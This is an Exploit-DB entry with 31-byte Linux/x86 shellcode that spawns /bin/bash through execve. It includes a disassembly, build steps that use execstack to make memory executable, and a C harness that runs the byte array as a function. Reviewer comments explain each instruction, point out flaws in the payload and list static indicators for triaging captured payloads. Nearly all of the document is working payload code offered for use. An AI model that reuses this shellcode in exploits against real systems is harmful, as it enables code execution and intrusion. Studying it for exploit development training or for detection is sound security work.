Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)

EDB-ID:

38088

CVE:

N/A


Platform:

Linux_x86

Published:

2015-09-06

/*
---------------------------------------------------------------------------------------------------

Linux/x86 - execve(/bin/bash) - 31 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

 08048060 <.text>:
 8048060:	b0 46                	mov    $0x46,%al
 8048062:	31 c0                	xor    %eax,%eax
 8048064:	cd 80                	int    $0x80
 8048066:	eb 07                	jmp    0x804806f
 8048068:	5b                   	pop    %ebx
 8048069:	31 c0                	xor    %eax,%eax
 804806b:	b0 0b                	mov    $0xb,%al
 804806d:	cd 80                	int    $0x80
 804806f:	31 c9                	xor    %ecx,%ecx
 8048071:	e8 f2 ff ff ff       	call   0x8048068
 8048076:	2f                   	das    
 8048077:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 804807a:	2f                   	das    
 804807b:	62 61 73             	bound  %esp,0x73(%ecx)
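 804807e:	68                   	.byte 0x68
 (bytes 0x8048076-0x804807e are not code: they are the ASCII string "/bin/bash",
  which the disassembler has decoded as das/bound instructions)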
---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bash_shell bash_shell.c
$ execstack -s bash_shell
$ ./bash_shell

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
/*
 * Byte-for-byte copy of the 31-byte payload disassembled in the header
 * comment, split per instruction for readability. Reviewer notes:
 *  - The first int $0x80 is issued with eax == 0: al is loaded with 0x46
 *    (the i386 setreuid number) but eax is zeroed by the next instruction,
 *    and ebx/ecx are never written before that call.
 *  - execve (eax = 0xb) receives ebx = address of the trailing string and
 *    ecx = 0; edx is never written, so the third argument is whatever the
 *    caller left in that register.
 *  - The payload carries no NUL of its own; in this harness the path is
 *    terminated only by the implicit NUL that the C string literal appends
 *    (sizeof sh is 32).
 *  - The jmp/call/pop sequence and the plain-ASCII "/bin/bash" tail are
 *    useful static indicators when triaging captured payloads.
 */
char sh[] =
	"\xb0\x46"                              /* mov  $0x46,%al            */
	"\x31\xc0"                              /* xor  %eax,%eax            */
	"\xcd\x80"                              /* int  $0x80                */
	"\xeb\x07"                              /* jmp  +7 (to xor %ecx)     */
	"\x5b"                                  /* pop  %ebx                 */
	"\x31\xc0"                              /* xor  %eax,%eax            */
	"\xb0\x0b"                              /* mov  $0xb,%al             */
	"\xcd\x80"                              /* int  $0x80                */
	"\x31\xc9"                              /* xor  %ecx,%ecx            */
	"\xe8\xf2\xff\xff\xff"                  /* call -14 (to pop %ebx)    */
	"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; /* data: "/bin/bash"         */
/*
 * Test harness: treats the sh byte array as a function and calls it.
 *
 * sh is an ordinary initialized data array, so the call can only succeed
 * when that memory is mapped executable; the run steps in the header
 * comment use execstack -s for that reason. On a build with the default
 * non-executable data/stack policy the call would be expected to fault
 * rather than run the payload.
 *
 * NOTE(review): void main and the object-pointer to function-pointer cast
 * are non-standard C; both are kept exactly as published.
 */
void main(int argc, char **argv)
{
	/* argc and argv are not used. */
	int (*entry)() = (int (*)()) sh;

	/* The return value is discarded, as in the original harness. */
	entry();
}